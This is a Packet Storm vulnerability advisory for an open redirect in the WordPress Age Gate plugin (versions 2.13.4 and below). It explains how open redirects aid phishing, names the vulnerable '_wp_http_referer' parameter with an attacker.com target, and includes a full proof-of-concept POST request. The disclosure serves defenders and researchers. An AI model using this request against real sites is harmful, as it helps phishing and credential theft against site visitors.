exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Age Gate 2.13.4 Open Redirect

WordPress Age Gate 2.13.4 Open Redirect
Posted Nov 27, 2020
Authored by Ilca Lucian Florin

WordPress Age Gate plugin versions 2.13.4 and below suffer fro an open redirection vulnerability.

tags | exploit
SHA-256 | 1fb8756a3c916898cce344aa523ef8ae14e2114dc3665716be68892817ef0afa

WordPress Age Gate 2.13.4 Open Redirect

Change Mirror Download
# Exploit Title: URL Redirection to Untrusted Site ('Open Redirect') Age
Gate Wordpress Plugin <= 2.13.4
# Date: 11/27/2020
# Exploit Author: Ilca Lucian Florin
# Vendor Homepage: https://agegate.io/
# Software Link: https://wordpress.org/plugins/age-gate/
# Version: <= 2.13.4
# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox,
Microsoft Edge
# CVE: Waiting...

A web application accepts a user-controlled input that specifies a link to
an external site, and uses that link in a Redirect. This simplifies
phishing attacks. An http parameter may contain a URL value and could cause
the web application to redirect the request to the specified URL. By
modifying the URL value to a malicious site, an attacker may successfully
launch a phishing scam and steal user credentials. Because the server name
in the modified link is identical to the original site, phishing attempts
have a more trustworthy appearance. The impacts can be many, and vary from
the theft of information and credentials to the redirection to malicious
websites containing attacker-controlled content, which in some cases even
cause XSS attacks. So even though an open redirection might sound harmless
at first, the impacts of it can be severe should it be exploitable.

An Open Redirection is when a web application or server uses an unvalidated
user-submitted link to redirect the user to a given website or page. Even
though it seems like a harmless action to let a user decide to which page
he wants to be redirected, such technique if exploited can have a serious
impact on the application security, especially when combined with other
vulnerabilities and tricks.

Vulnerable parameter is: _wp_http_referer=https://attacker.com

# Example of burp request #

POST /wp-admin/admin-post.php HTTP/1.1
Host: website.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 189
Origin: https://website.com
Connection: close
Referer: https://website.com/
Cookie: wordpress_sec_5fabc=editor%7C1606490639%b%abc;
__cfduid=def4624292458dcfae5008c89bb76b3ed1606317827; ftc_post_view_4716=1;
wordpress_test_cookie=WP%20Cookie%20check;
wordpress_logged_in_123=editor%%%abc;
wp-wpml_current_admin_language_d41d8cd98f00b204e9800998ecf8427e=mk;
wfwaf-authcookie-abc=12%7Ceditor%abc; tk_ai=woo%;
wp-settings-time-12=1606317841; wp-wpml_current_language=en;
ftc_post_view_934=1; _ga=GA1.2.; _gid=GA1.2.; _gat=1
Upgrade-Insecure-Requests: 1

age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=
https://google.ro

Demo:

1. https://ibb.co/1K9MhhY
2. https://ibb.co/xSYQjZm
3. https://ibb.co/TMbS9yL

C.V.S.S Score: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L / 7.1 (High)

There are over 20.000 wordpress websites using this plugin at this moment.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close